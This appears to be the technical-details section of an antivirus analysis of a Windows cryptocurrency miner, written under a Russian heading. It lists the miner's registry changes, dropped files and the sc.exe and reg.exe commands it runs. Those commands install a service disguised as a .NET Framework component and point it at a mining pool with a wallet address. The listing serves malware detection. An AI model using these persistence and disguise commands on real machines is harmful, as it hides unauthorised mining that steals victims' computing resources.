Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\HelpSvcsss] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\HelpSvcsss] 'ImagePath' = '%CommonProgramFiles%\System\alg.exe'
- %CommonProgramFiles%\System\WmiApSvr.exe
- %CommonProgramFiles%\System\alg.exe
- %CommonProgramFiles%\System\Setup.bat
- ClassName: 'EDIT' WindowName: ''
- '%CommonProgramFiles%\System\alg.exe'
- '<SYSTEM32>\cmd.exe' /c ""%CommonProgramFiles%\System\Setup.bat" "
- '<SYSTEM32>\sc.exe' create HelpSvcsss binPath= "%CommonProgramFiles%\System\alg.exe" start= auto displayname= "Microsoft .NET Framework v2.0"
- '<SYSTEM32>\sc.exe' Description HelpSvcsss "Microsoft .NET Framework v2.0 Optimization Service"
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\HelpSvcsss\Parameters /v Application /t REG_SZ /d "WmiApSvr" /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\HelpSvcsss\Parameters /v AppParameters /t REG_SZ /d "-a cryptonight -o stratum+tcp://pool.usa-138.com:443 -u 49e9B8HxzSbMWsNbMs72aVe78U9CCE2DAM5aDJYNe...
- '<SYSTEM32>\sc.exe' start Helpsvcsss